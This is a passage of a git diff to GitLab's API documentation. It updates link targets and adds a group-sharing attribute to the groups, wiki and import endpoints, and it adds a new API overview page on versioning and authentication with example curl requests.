integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `content` | string | yes | The content of the wiki page | | `title` | string | yes | The title of the wiki page | | `format` | string | no | The format of the wiki page. Available formats are: `markdown` (default), `rdoc`, `asciidoc` and `org` | @@ -123,7 +123,7 @@ PUT /groups/:id/wikis/:slug | Attribute | Type | Required | Description | | --------------- | ------- | --------------------------------- | ------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `content` | string | yes if `title` is not provided | The content of the wiki page | | `title` | string | yes if `content` is not provided | The title of the wiki page | | `format` | string | no | The format of the wiki page. Available formats are: `markdown` (default), `rdoc`, `asciidoc` and `org` | @@ -156,7 +156,7 @@ DELETE /groups/:id/wikis/:slug | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `slug` | string | yes | URL-encoded slug (a unique string) of the wiki page, such as `dir%2Fpage_name` | ```shell @@ -176,7 +176,7 @@ POST /groups/:id/wikis/attachments | Attribute | Type | Required | Description | | ------------- | ------- | -------- | ---------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `file` | string | yes | The attachment to be uploaded | | `branch` | string | no | The name of the branch. Defaults to the wiki repository default branch | diff --git a/doc/api/groups.md b/doc/api/groups.md index de2c6c95bcd..23a8dba954f 100644 --- a/doc/api/groups.md +++ b/doc/api/groups.md @@ -11,7 +11,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w Get a list of visible groups for the authenticated user. When accessed without authentication, only public groups are returned. -By default, this request returns 20 results at a time because the API results [are paginated](README.md#pagination). +By default, this request returns 20 results at a time because the API results [are paginated](index.md#pagination). Parameters: @@ -20,7 +20,7 @@ Parameters: | `skip_groups` | array of integers | no | Skip the group IDs passed | | `all_available` | boolean | no | Show all the groups you have access to (defaults to `false` for authenticated users, `true` for administrators); Attributes `owned` and `min_access_level` have precedence | | `search` | string | no | Return the list of authorized groups matching the search criteria | -| `order_by` | string | no | Order groups by `name`, `path` or `id`. Default is `name` | +| `order_by` | string | no | Order groups by `name`, `path`, `id`, or `similarity` (if searching, [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/332889) in GitLab 14.1). Default is `name` | | `sort` | string | no | Order groups in `asc` or `desc` order. Default is `asc` | | `statistics` | boolean | no | Include group statistics (administrators only) | | `with_custom_attributes` | boolean | no | Include [custom attributes](custom_attributes.md) in response (administrators only) | @@ -122,13 +122,13 @@ GET /groups?custom_attributes[key]=value&custom_attributes[other_key]=other_valu Get a list of visible direct subgroups in this group. When accessed without authentication, only public groups are returned. -By default, this request returns 20 results at a time because the API results [are paginated](README.md#pagination). +By default, this request returns 20 results at a time because the API results [are paginated](index.md#pagination). Parameters: | Attribute | Type | Required | Description | | ------------------------ | ----------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) of the immediate parent group | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) of the immediate parent group | | `skip_groups` | array of integers | no | Skip the group IDs passed | | `all_available` | boolean | no | Show all the groups you have access to (defaults to `false` for authenticated users, `true` for administrators); Attributes `owned` and `min_access_level` have precedence | | `search` | string | no | Return the list of authorized groups matching the search criteria | @@ -180,13 +180,13 @@ GET /groups/:id/subgroups Get a list of visible descendant groups of this group. When accessed without authentication, only public groups are returned. -By default, this request returns 20 results at a time because the API results [are paginated](README.md#pagination). +By default, this request returns 20 results at a time because the API results [are paginated](index.md#pagination). Parameters: | Attribute | Type | Required | Description | | ------------------------ | ----------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) of the immediate parent group | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) of the immediate parent group | | `skip_groups` | array of integers | no | Skip the group IDs passed | | `all_available` | boolean | no | Show all the groups you have access to (defaults to `false` for authenticated users, `true` for administrators). Attributes `owned` and `min_access_level` have precedence | | `search` | string | no | Return the list of authorized groups matching the search criteria | @@ -260,7 +260,7 @@ GET /groups/:id/descendant_groups Get a list of projects in this group. When accessed without authentication, only public projects are returned. -By default, this request returns 20 results at a time because the API results [are paginated](README.md#pagination). +By default, this request returns 20 results at a time because the API results [are paginated](index.md#pagination). ```plaintext GET /groups/:id/projects @@ -270,7 +270,7 @@ Parameters: | Attribute | Type | Required | Description | | ----------------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `archived` | boolean | no | Limit by archived status | | `visibility` | string | no | Limit by visibility `public`, `internal`, or `private` | | `order_by` | string | no | Return projects ordered by `id`, `name`, `path`, `created_at`, `updated_at`, `similarity` (1), or `last_activity_at` fields. Default is `created_at` | @@ -346,7 +346,7 @@ To distinguish between a project in the group and a project shared to the group, Get a list of projects shared to this group. When accessed without authentication, only public shared projects are returned. -By default, this request returns 20 results at a time because the API results [are paginated](README.md#pagination). +By default, this request returns 20 results at a time because the API results [are paginated](index.md#pagination). ```plaintext GET /groups/:id/projects/shared @@ -356,7 +356,7 @@ Parameters: | Attribute | Type | Required | Description | | ----------------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `archived` | boolean | no | Limit by archived status | | `visibility` | string | no | Limit by visibility `public`, `internal`, or `private` | | `order_by` | string | no | Return projects ordered by `id`, `name`, `path`, `created_at`, `updated_at`, or `last_activity_at` fields. Default is `created_at` | @@ -489,7 +489,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------------------ | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user. | | `with_custom_attributes` | boolean | no | Include [custom attributes](custom_attributes.md) in response (administrators only). | | `with_projects` | boolean | no | Include details from projects that belong to the specified group (defaults to `true`). (Deprecated, [scheduled for removal in API v5](https://gitlab.com/gitlab-org/gitlab/-/issues/213797). To get the details of all projects within a group, use the [list a group's projects endpoint](#list-a-groups-projects).) | @@ -535,6 +535,7 @@ Example response: "expires_at": null } ], + "prevent_sharing_groups_outside_hierarchy": false, "projects": [ // Deprecated and will be removed in API v5 { "id": 7, @@ -673,6 +674,8 @@ Example response: } ``` +The `prevent_sharing_groups_outside_hierarchy` attribute is present only on top-level groups. + Users of [GitLab Premium or higher](https://about.gitlab.com/pricing/) also see the `shared_runners_minutes_limit` and `extra_shared_runners_minutes_limit` parameters: @@ -835,8 +838,8 @@ Parameters: | Attribute | Type | Required | Description | | ------------ | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the target group](README.md#namespaced-path-encoding) | -| `project_id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the target group](index.md#namespaced-path-encoding) | +| `project_id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | ```shell curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" \ @@ -851,31 +854,32 @@ Updates the project group. Only available to group owners and administrators. PUT /groups/:id ``` -| Attribute | Type | Required | Description | -| ------------------------------------ | ------- | -------- | ----------- | -| `id` | integer | yes | The ID of the group. | -| `name` | string | no | The name of the group. | -| `path` | string | no | The path of the group. | -| `description` | string | no | The description of the group. | -| `membership_lock` | boolean | no | **(PREMIUM)** Prevent adding new members to project membership within this group. | -| `share_with_group_lock` | boolean | no | Prevent sharing a project with another group within this group. | -| `visibility` | string | no | The visibility level of the group. Can be `private`, `internal`, or `public`. | -| `require_two_factor_authentication` | boolean | no | Require all users in this group to setup Two-factor authentication. | -| `two_factor_grace_period` | integer | no | Time before Two-factor authentication is enforced (in hours). | -| `project_creation_level` | string | no | Determine if developers can create projects in the group. Can be `noone` (No one), `maintainer` (Maintainers), or `developer` (Developers + Maintainers). | -| `auto_devops_enabled` | boolean | no | Default to Auto DevOps pipeline for all projects within this group. | -| `subgroup_creation_level` | string | no | Allowed to [create subgroups](../user/group/subgroups/index.md#creating-a-subgroup). Can be `owner` (Owners), or `maintainer` (Maintainers). | -| `emails_disabled` | boolean | no | Disable email notifications | -| `avatar` | mixed | no | Image file for avatar of the group. [Introduced in GitLab 12.9](https://gitlab.com/gitlab-org/gitlab/-/issues/36681) | -| `mentions_disabled` | boolean | no | Disable the capability of a group from getting mentioned | -| `lfs_enabled` (optional) | boolean | no | Enable/disable Large File Storage (LFS) for the projects in this group. | -| `request_access_enabled` | boolean | no | Allow users to request member access. | -| `default_branch_protection` | integer | no | See [Options for `default_branch_protection`](#options-for-default_branch_protection). | -| `file_template_project_id` | integer | no | **(PREMIUM)** The ID of a project to load custom file templates from. | -| `shared_runners_minutes_limit` | integer | no | **(PREMIUM SELF)** Pipeline minutes quota for this group (included in plan). Can be `nil` (default; inherit system default), `0` (unlimited) or `> 0` | -| `extra_shared_runners_minutes_limit` | integer | no | **(PREMIUM SELF)** Extra pipeline minutes quota for this group (purchased in addition to the minutes included in the plan). | -| `prevent_forking_outside_group` | boolean | no | **(PREMIUM)** When enabled, users can **not** fork projects from this group to external namespaces -| `shared_runners_setting` | string | no | See [Options for `shared_runners_setting`](#options-for-shared_runners_setting). Enable or disable shared runners for a group's subgroups and projects. | +| Attribute | Type | Required | Description | +| ------------------------------------------ | ------- | -------- | ----------- | +| `id` | integer | yes | The ID of the group. | +| `name` | string | no | The name of the group. | +| `path` | string | no | The path of the group. | +| `description` | string | no | The description of the group. | +| `membership_lock` | boolean | no | **(PREMIUM)** Prevent adding new members to project membership within this group. | +| `share_with_group_lock` | boolean | no | Prevent sharing a project with another group within this group. | +| `visibility` | string | no | The visibility level of the group. Can be `private`, `internal`, or `public`. | +| `require_two_factor_authentication` | boolean | no | Require all users in this group to setup Two-factor authentication. | +| `two_factor_grace_period` | integer | no | Time before Two-factor authentication is enforced (in hours). | +| `project_creation_level` | string | no | Determine if developers can create projects in the group. Can be `noone` (No one), `maintainer` (Maintainers), or `developer` (Developers + Maintainers). | +| `auto_devops_enabled` | boolean | no | Default to Auto DevOps pipeline for all projects within this group. | +| `subgroup_creation_level` | string | no | Allowed to [create subgroups](../user/group/subgroups/index.md#creating-a-subgroup). Can be `owner` (Owners), or `maintainer` (Maintainers). | +| `emails_disabled` | boolean | no | Disable email notifications | +| `avatar` | mixed | no | Image file for avatar of the group. [Introduced in GitLab 12.9](https://gitlab.com/gitlab-org/gitlab/-/issues/36681) | +| `mentions_disabled` | boolean | no | Disable the capability of a group from getting mentioned | +| `lfs_enabled` (optional) | boolean | no | Enable/disable Large File Storage (LFS) for the projects in this group. | +| `request_access_enabled` | boolean | no | Allow users to request member access. | +| `default_branch_protection` | integer | no | See [Options for `default_branch_protection`](#options-for-default_branch_protection). | +| `file_template_project_id` | integer | no | **(PREMIUM)** The ID of a project to load custom file templates from. | +| `shared_runners_minutes_limit` | integer | no | **(PREMIUM SELF)** Pipeline minutes quota for this group (included in plan). Can be `nil` (default; inherit system default), `0` (unlimited) or `> 0` | +| `extra_shared_runners_minutes_limit` | integer | no | **(PREMIUM SELF)** Extra pipeline minutes quota for this group (purchased in addition to the minutes included in the plan). | +| `prevent_forking_outside_group` | boolean | no | **(PREMIUM)** When enabled, users can **not** fork projects from this group to external namespaces +| `shared_runners_setting` | string | no | See [Options for `shared_runners_setting`](#options-for-shared_runners_setting). Enable or disable shared runners for a group's subgroups and projects. | +| `prevent_sharing_groups_outside_hierarchy` | boolean | no | See [Prevent group sharing outside the group hierarchy](../user/group/index.md#prevent-group-sharing-outside-the-group-hierarchy). This attribute is only available on top-level groups. [Introduced in GitLab 14.1](https://gitlab.com/gitlab-org/gitlab/-/issues/333721) | NOTE: The `projects` and `shared_projects` attributes in the response are deprecated and [scheduled for removal in API v5](https://gitlab.com/gitlab-org/gitlab/-/issues/213797). @@ -910,6 +914,7 @@ Example response: "file_template_project_id": 1, "parent_id": null, "created_at": "2020-01-15T12:36:29.590Z", + "prevent_sharing_groups_outside_hierarchy": false, "projects": [ // Deprecated and will be removed in API v5 { "id": 9, @@ -954,6 +959,8 @@ Example response: } ``` +The `prevent_sharing_groups_outside_hierarchy` attribute is present in the response only for top-level groups. + ### Disable the results limit **(FREE SELF)** The 100 results limit can break integrations developed using GitLab 12.4 and earlier. @@ -1010,7 +1017,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | The response is `202 Accepted` if the user has authorization. @@ -1031,7 +1038,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | ## Search for group @@ -1067,7 +1074,7 @@ GET /groups/:id/hooks | Attribute | Type | Required | Description | | --------- | --------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | ### Get group hook @@ -1075,7 +1082,7 @@ Get a specific hook for a group. | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `hook_id` | integer | yes | The ID of a group hook | ```plaintext @@ -1115,7 +1122,7 @@ POST /groups/:id/hooks | Attribute | Type | Required | Description | | -----------------------------| -------------- | ---------| ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `url` | string | yes | The hook URL | | `push_events` | boolean | no | Trigger hook on push events | | `issues_events` | boolean | no | Trigger hook on issues events | @@ -1143,7 +1150,7 @@ PUT /groups/:id/hooks/:hook_id | Attribute | Type | Required | Description | | ---------------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `hook_id` | integer | yes | The ID of the group hook | | `url` | string | yes | The hook URL | | `push_events` | boolean | no | Trigger hook on push events | @@ -1173,7 +1180,7 @@ DELETE /groups/:id/hooks/:hook_id | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `hook_id` | integer | yes | The ID of the group hook. | ## Group Audit Events **(PREMIUM)** @@ -1210,7 +1217,7 @@ GET /groups/:id/ldap_group_links | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | ### Add LDAP group link with CN or filter **(PREMIUM SELF)** @@ -1222,7 +1229,7 @@ POST /groups/:id/ldap_group_links | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `cn` | string | no | The CN of an LDAP group | | `filter` | string | no | The LDAP filter for the group | | `group_access` | integer | yes | Minimum [access level](members.md#valid-access-levels) for members of the LDAP group | @@ -1241,7 +1248,7 @@ DELETE /groups/:id/ldap_group_links/:cn | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `cn` | string | yes | The CN of an LDAP group | Deletes an LDAP group link for a specific LDAP provider. Deprecated. Scheduled for removal in a future release. @@ -1252,7 +1259,7 @@ DELETE /groups/:id/ldap_group_links/:provider/:cn | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `cn` | string | yes | The CN of an LDAP group | | `provider` | string | yes | LDAP provider for the LDAP group link | @@ -1266,7 +1273,7 @@ DELETE /groups/:id/ldap_group_links | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `cn` | string | no | The CN of an LDAP group | | `filter` | string | no | The LDAP filter for the group | | `provider` | string | yes | LDAP provider for the LDAP group link | @@ -1314,7 +1321,7 @@ POST /groups/:id/share | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `group_id` | integer | yes | The ID of the group to share with | | `group_access` | integer | yes | The [access level](members.md#valid-access-levels) to grant the group | | `expires_at` | string | no | Share expiration date in ISO 8601 format: 2016-09-26 | @@ -1329,7 +1336,7 @@ DELETE /groups/:id/share/:group_id | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `group_id` | integer | yes | The ID of the group to share with | ## Push Rules **(PREMIUM)** @@ -1348,7 +1355,7 @@ GET /groups/:id/push_rule | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID of the group or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID of the group or [URL-encoded path of the group](index.md#namespaced-path-encoding) | ```json { @@ -1391,15 +1398,15 @@ POST /groups/:id/push_rule | Attribute | Type | Required | Description | | --------------------------------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `deny_delete_tag` | boolean | no | Deny deleting a tag | | `member_check` | boolean | no | Allows only GitLab users to author commits | | `prevent_secrets` | boolean | no | [Files that are likely to contain secrets](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/lib/gitlab/checks/files_denylist.yml) are rejected | -| `commit_message_regex` | string | no | All commit messages must match the regular expression provided in this attribute, e.g. `Fixed \d+\..*` | -| `commit_message_negative_regex` | string | no | Commit messages matching the regular expression provided in this attribute aren't allowed, e.g. `ssh\:\/\/` | -| `branch_name_regex` | string | no | All branch names must match the regular expression provided in this attribute, e.g. `(feature|hotfix)\/*` | -| `author_email_regex` | string | no | All commit author emails must match the regular expression provided in this attribute, e.g. `@my-company.com$` | -| `file_name_regex` | string | no | Filenames matching the regular expression provided in this attribute are **not** allowed, e.g. `(jar|exe)$` | +| `commit_message_regex` | string | no | All commit messages must match the regular expression provided in this attribute, for example, `Fixed \d+\..*` | +| `commit_message_negative_regex` | string | no | Commit messages matching the regular expression provided in this attribute aren't allowed, for example, `ssh\:\/\/` | +| `branch_name_regex` | string | no | All branch names must match the regular expression provided in this attribute, for example, `(feature|hotfix)\/*` | +| `author_email_regex` | string | no | All commit author emails must match the regular expression provided in this attribute, for example, `@my-company.com$` | +| `file_name_regex` | string | no | Filenames matching the regular expression provided in this attribute are **not** allowed, for example, `(jar|exe)$` | | `max_file_size` | integer | no | Maximum file size (MB) allowed | | `commit_committer_check` | boolean | no | Only commits pushed using verified emails are allowed | | `reject_unsigned_commits` | boolean | no | Only commits signed through GPG are allowed | @@ -1438,15 +1445,15 @@ PUT /groups/:id/push_rule | Attribute | Type | Required | Description | | --------------------------------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `deny_delete_tag` | boolean | no | Deny deleting a tag | | `member_check` | boolean | no | Restricts commits to be authored by existing GitLab users only | | `prevent_secrets` | boolean | no | [Files that are likely to contain secrets](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/lib/gitlab/checks/files_denylist.yml) are rejected | -| `commit_message_regex` | string | no | All commit messages must match the regular expression provided in this attribute, e.g. `Fixed \d+\..*` | -| `commit_message_negative_regex` | string | no | Commit messages matching the regular expression provided in this attribute aren't allowed, e.g. `ssh\:\/\/` | -| `branch_name_regex` | string | no | All branch names must match the regular expression provided in this attribute, e.g. `(feature|hotfix)\/*` | -| `author_email_regex` | string | no | All commit author emails must match the regular expression provided in this attribute, e.g. `@my-company.com$` | -| `file_name_regex` | string | no | Filenames matching the regular expression provided in this attribute are **not** allowed, e.g. `(jar|exe)$` | +| `commit_message_regex` | string | no | All commit messages must match the regular expression provided in this attribute, for example, `Fixed \d+\..*` | +| `commit_message_negative_regex` | string | no | Commit messages matching the regular expression provided in this attribute aren't allowed, for example, `ssh\:\/\/` | +| `branch_name_regex` | string | no | All branch names must match the regular expression provided in this attribute, for example, `(feature|hotfix)\/*` | +| `author_email_regex` | string | no | All commit author emails must match the regular expression provided in this attribute, for example, `@my-company.com$` | +| `file_name_regex` | string | no | Filenames matching the regular expression provided in this attribute are **not** allowed, for example, `(jar|exe)$` | | `max_file_size` | integer | no | Maximum file size (MB) allowed | | `commit_committer_check` | boolean | no | Only commits pushed using verified emails are allowed | | `reject_unsigned_commits` | boolean | no | Only commits signed through GPG are allowed | @@ -1485,4 +1492,4 @@ DELETE /groups/:id/push_rule | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | diff --git a/doc/api/import.md b/doc/api/import.md index e1585d02ae3..d556c8af971 100644 --- a/doc/api/import.md +++ b/doc/api/import.md @@ -20,7 +20,7 @@ POST /import/github | `repo_id` | integer | yes | GitHub repository ID | | `new_name` | string | no | New repository name | | `target_namespace` | string | yes | Namespace to import repository into. Supports subgroups like `/namespace/subgroup`. | -| `github_hostname` | string | no | Custom GitHub enterprise hostname. Defaults to GitHub.com if `github_hostname` is not set. | +| `github_hostname` | string | no | Custom GitHub Enterprise hostname. Do not set for GitHub.com. | ```shell curl --request POST \ @@ -31,7 +31,8 @@ curl --request POST \ "personal_access_token": "aBc123abC12aBc123abC12abC123+_A/c123", "repo_id": "12345", "target_namespace": "group/subgroup", - "new_name": "NEW-NAME" + "new_name": "NEW-NAME", + "github_hostname": "https://github.example.com" }' ``` diff --git a/doc/api/index.md b/doc/api/index.md new file mode 100644 index 00000000000..f1059904ac3 --- /dev/null +++ b/doc/api/index.md @@ -0,0 +1,847 @@ +--- +stage: Create +group: Ecosystem +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# API Docs **(FREE)** + +Use the GitLab APIs to automate GitLab. + +You can also use a partial [OpenAPI definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/api/openapi/openapi.yaml), +to test the API directly from the GitLab user interface. +Contributions are welcome. + +## REST API + +A REST API is available in GitLab. +Usage instructions are below. +For a list of the available resources and their endpoints, see +[REST API resources](api_resources.md). + +<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> +For an introduction and basic steps, see +[How to make GitLab API calls](https://www.youtube.com/watch?v=0LsMC3ZiXkA). + +## SCIM API **(PREMIUM SAAS)** + +GitLab provides an [SCIM API](scim.md) that both implements +[the RFC7644 protocol](https://tools.ietf.org/html/rfc7644) and provides the +`/Users` endpoint. The base URL is `/api/scim/v2/groups/:group_path/Users/`. + +## GraphQL API + +A [GraphQL API](graphql/index.md) is available in GitLab. + +With GraphQL, you can make an API request for only what you need, +and it's versioned by default. + +GraphQL co-exists with the current v4 REST API. If we have a v5 API, this should +be a compatibility layer on top of GraphQL. + +There were some patenting and licensing concerns with GraphQL. However, these +have been resolved to our satisfaction. The reference implementations +were re-licensed under MIT, and the OWF license used for the GraphQL specification. + +When GraphQL is fully implemented, GitLab: + +- Can delete controller-specific endpoints. +- Will no longer maintain two different APIs. + +## Compatibility guidelines + +The HTTP API is versioned with a single number, which is currently `4`. This number +symbolizes the major version number, as described by [SemVer](https://semver.org/). +Because of this, backward-incompatible changes require this version number to +change. + +The minor version isn't explicit, which allows for a stable API +endpoint. New features can be added to the API in the same +version number. + +New features and bug fixes are released in tandem with GitLab. Apart +from incidental patch and security releases, GitLab is released on the 22nd of each +month. Major API version changes, and removal of entire API versions, are done in tandem +with major GitLab releases. + +All deprecations and changes between versions are in the documentation. +For the changes between v3 and v4, see the [v3 to v4 documentation](v3_to_v4.md). + +### Current status + +Only API version v4 is available. Version v3 was removed in +[GitLab 11.0](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/36819). + +## How to use the API + +API requests must include both `api` and the API version. The API +version is defined in [`lib/api.rb`](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/api/api.rb). +For example, the root of the v4 API is at `/api/v4`. + +### Valid API request + +If you have a GitLab instance at `gitlab.example.com`: + +```shell +curl "https://gitlab.example.com/api/v4/projects" +``` + +The API uses JSON to serialize data. You don't need to specify `.json` at the +end of the API URL. + +### API request to expose HTTP response headers + +If you want to expose HTTP response headers, use the `--include` option: + +```shell +curl --include "https://gitlab.example.com/api/v4/projects" +HTTP/2 200 +... +``` + +This request can help you investigate an unexpected response. + +### API request that includes the exit code + +If you want to expose the HTTP exit code, include the `--fail` option: + +```shell +curl --fail "https://gitlab.example.com/api/v4/does-not-exist" +curl: (22) The requested URL returned error: 404 +``` + +The HTTP exit code can help you diagnose the success or failure of your REST request. + +## Authentication + +Most API requests require authentication, or only return public data when +authentication isn't provided. When authentication is not required, the documentation +for each endpoint specifies this. For example, the +[`/projects/:id` endpoint](projects.md#get-single-project) does not require authentication. + +There are several ways you can authenticate with the GitLab API: + +- [OAuth2 tokens](#oauth2-tokens) +- [Personal access tokens](../user/profile/personal_access_tokens.md) +- [Project access tokens](../user/project/settings/project_access_tokens.md) +- [Session cookie](#session-cookie) +- [GitLab CI/CD job token](#gitlab-cicd-job-token) **(Specific endpoints only)** + +Project access tokens are supported by: + +- Self-managed GitLab Free and higher. +- GitLab SaaS Premium and higher. + +If you are an administrator, you or your application can authenticate as a specific user. +To do so, use: + +- [Impersonation tokens](#impersonation-tokens) +- [Sudo](#sudo) + +If authentication information is not valid or is missing, GitLab returns an error +message with a status code of `401`: + +```json +{ + "message": "401 Unauthorized" +} +``` + +### OAuth2 tokens + +You can use an [OAuth2 token](oauth2.md) to authenticate with the API by passing +it in either the `access_token` parameter or the `Authorization` header. + +Example of using the OAuth2 token in a parameter: + +```shell +curl "https://gitlab.example.com/api/v4/projects?access_token=OAUTH-TOKEN" +``` + +Example of using the OAuth2 token in a header: + +```shell +curl --header "Authorization: Bearer OAUTH-TOKEN" "https://gitlab.example.com/api/v4/projects" +``` + +Read more about [GitLab as an OAuth2 provider](oauth2.md). + +### Personal/project access tokens + +You can use access tokens to authenticate with the API by passing it in either +the `private_token` parameter or the `PRIVATE-TOKEN` header. + +Example of using the personal or project access token in a parameter: + +```shell +curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>" +``` + +Example of using the personal or project access token in a header: + +```shell +curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects" +``` + +You can also use personal or project access tokens with OAuth-compliant headers: + +```shell +curl --header "Authorization: Bearer <your_access_token>" "https://gitlab.example.com/api/v4/projects" +``` + +### Session cookie + +Signing in to the main GitLab application sets a `_gitlab_session` cookie. The +API uses this cookie for authentication if it's present. Using the API to +generate a new session cookie isn't supported. + +The primary user of this authentication method is the web frontend of GitLab +itself. The web frontend can use the API as the authenticated user to get a +list of projects without explicitly passing an access token. + +### GitLab CI/CD job token + +When a pipeline job is about to run, GitLab generates a unique token and injects it as the +[`CI_JOB_TOKEN` predefined variable](../ci/variables/predefined_variables.md). + +You can use a GitLab CI/CD job token to authenticate with specific API endpoints: + +- Packages: + - [Package Registry](../user/packages/package_registry/index.md). To push to the + Package Registry, you can use [deploy tokens](../user/project/deploy_tokens/index.md). + - [Container 